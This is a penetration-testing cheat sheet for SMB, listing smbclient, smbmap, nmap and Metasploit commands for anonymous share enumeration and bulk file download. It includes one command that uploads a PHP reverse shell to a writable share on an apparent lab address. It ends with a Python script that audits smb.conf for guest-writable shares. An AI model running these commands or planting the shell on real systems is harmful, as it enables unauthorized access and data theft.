SMB

Server Message Block - Ports 445/139

smbclient

Without Credentials

List resources
smbclient -L <IP>
List resources with a null session
smbclient -N -L <IP>
Connect to a share as a user
smbclient //<IP>/<SHARE> -U <USER>
Connect to share
smbclient -N //<IP>/<Share>
Without Credentials
smbclient --no-pass //<IP>/<Share>
Resources list + Null session
smbclient -L //10.10.10.123 -N
Upload PHP reverse shell
smbclient -N //10.10.10.123/Development -c 'put cmd.php tokyo.php'

Download a File

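Inside an smbclient session, type this sequence (recurse toggles directory recursion on, prompt toggles per-file confirmation off, mget * then fetches everything)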
recurse
prompt
mget *
Enumeration
Nmap Scan
nmap --script smb-enum-shares.nse -p445 10.10.10.123
Stealthy Nmap Scan
nmap -n -Pn -vv -O -sV --script "smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2*" 192.168.1.1
Metasploit Module
use auxiliary/scanner/smb/smb_enumshares

smbmap

Connect to host
smbmap -H <IP>
Connect with credentials
smbmap -H <IP> -d <domain> -u '<user>' -p '<pass>'
List Share
smbmap -H <IP> -r <SHARE>
SAMBA
Download file
smbget -U <User> smb://<IP>/<SHARE_LOCATION>
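
Audit for guest-accessible shares (added example, not part of the original page)
The null-session and --no-pass commands above only succeed against shares whose configuration allows guest access. This script flags such shares in a Samba smb.conf and marks the ones that are also writable; the sample config and the function names are constructed for illustration.

```python
import configparser

# Constructed sample smb.conf (not from the page).
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP

[Development]
   path = /srv/dev
   guest ok = yes
   read only = no

[Docs]
   path = /srv/docs
   public = yes

[Private]
   valid users = alice
   writable = yes
"""

GUEST_KEYS = ("guest ok", "public")                 # Samba synonyms
WRITE_KEYS = ("writable", "writeable", "write ok")  # inverse of "read only"
TRUE = {"yes", "true", "on", "1"}
SPECIAL = {"global", "homes", "printers"}

def _flag(section, keys):
    """Boolean value of the first synonym set in the section (default: False)."""
    for key in keys:
        if key in section:
            return section[key].strip().lower() in TRUE
    return False

def audit_smb_conf(text):
    """Return {share: finding} for shares the config opens to guest access."""
    # Samba ignores leading whitespace; configparser would read it as continuation.
    text = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   delimiters=("=",), comment_prefixes=("#", ";"))
    cp.read_string(text)
    findings = {}
    for name in cp.sections():
        share = cp[name]
        if name.lower() in SPECIAL or not _flag(share, GUEST_KEYS):
            continue
        writable = (share["read only"].strip().lower() not in TRUE
                    if "read only" in share else _flag(share, WRITE_KEYS))
        findings[name] = "guest-writable" if writable else "guest-readable"
    return findings
```

Run audit_smb_conf(open("/etc/samba/smb.conf").read()) on a server; any "guest-writable" result is a share that accepts anonymous uploads.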
NTLM Relay Attacks
